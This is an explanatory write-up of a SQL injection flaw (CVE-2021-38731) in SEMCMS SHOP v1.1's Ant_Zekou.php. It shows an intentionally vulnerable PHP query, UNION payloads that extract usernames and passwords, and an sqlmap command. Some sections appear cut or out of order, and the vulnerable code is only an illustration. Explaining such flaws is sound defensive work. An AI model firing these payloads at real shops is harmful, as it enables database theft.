CVE-2021-38731 - How SEMCMS SHOP v1.1 Was Exposed by a Simple SQL Injection in `Ant_Zekou.php`

In 2021, a critical SQL injection vulnerability was discovered in SEMCMS SHOP version 1.1, affecting the Ant_Zekou.php script. This security hole could let attackers mess with your online store’s database, access sensitive information, and possibly escalate attacks. Let’s break down what happened, how the exploit works, and what you can do about it—all in plain English.

What is SEMCMS SHOP v1.1?

SEMCMS SHOP is a PHP-based open-source e-commerce solution mainly used in China. Version 1.1 gained popularity as a free way for small businesses to get an online shop up and running. The problem? Its security only goes so far, and, as this case shows, a single unchecked script can bring down the whole operation.

The Vulnerability: SQL Injection in Ant_Zekou.php

SQL Injection is a classic web exploit. If web code fails to properly “sanitize” (clean up/check) the user’s input before placing it into a database query, an attacker can sneak in malicious SQL code.

In SEMCMS SHOP v1.1, it’s the Ant_Zekou.php file that’s at fault. Hackers discovered that if they tinkered with the right parameter, they could inject custom SQL commands.

Here’s the type of code you might see in Ant_Zekou.php

<?php
// This is a simplified version for demonstration
$id = $_GET['id'];
$query = "SELECT * FROM products WHERE id = $id";
$result = mysqli_query($conn, $query);
?>

Notice the line

$query = "SELECT * FROM products WHERE id = $id";

If someone sends

?id=1

That's fine—the server looks up product 1. But, what if someone sends

?id=1 OR 1=1

The query becomes

SELECT * FROM products WHERE id = 1 OR 1=1

This always returns all rows in your products table! And if an attacker gets really crafty, they can extract entire tables or even drop data.

Attackers try to change the id value in the GET request

http://example.com/Ant_Zekou.php?id=1

They test with SQL logic

http://example.com/Ant_Zekou.php?id=1' OR '1'='1

If both return a valid product list, it’s likely injectable.

Step 2: Extracting Information

With knowledge that the parameter is injectable, the attacker can enumerate the database. For instance:

?id=1 UNION SELECT 1, user(), database(), version(), 4#

The attacker can pull sensitive data (like emails, usernames, hashes)

?id=1 UNION SELECT 1, username, password, 4 FROM users#

Complete Exploit Example Using SQLMap

SQLMap is an open-source penetration testing tool that automates exploiting SQL injection flaws.

Here’s how an attacker could use it

sqlmap -u "http://example.com/Ant_Zekou.php?id=1" --dbs

This tries to find all the databases on your shop’s server.

Modifies site contents: Attackers could alter products, prices, or site functions.

- Complete takeover: If the attacker can write to the database, it may be possible to create admin accounts or implant backdoors.

The Official Reference

- NVD Listing - CVE-2021-38731
- VulDB Entry

Summary Table

| Risk Level | Where | What You Lose              | How to Fix            |
|------------|-------|---------------------------|-----------------------|
| High   | Ant_Zekou.php | Full database access      | Patch input, update PHP|
| Medium | All forms | Some data, possible takeover | Use prepared statements|
| Low    | After patch | None                      | Stay up to date       |

Final Thoughts

CVE-2021-38731 is a textbook example of why secure coding matters. One line of PHP, left unchecked, can mean the difference between a thriving webshop and a total disaster. Always validate, sanitize, and update—before someone else does it for you.

Resources

- https://nvd.nist.gov/vuln/detail/CVE-2021-38731
- https://vuldb.com/?id.181533
- SQLMap

Timeline

Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:48:00 UTC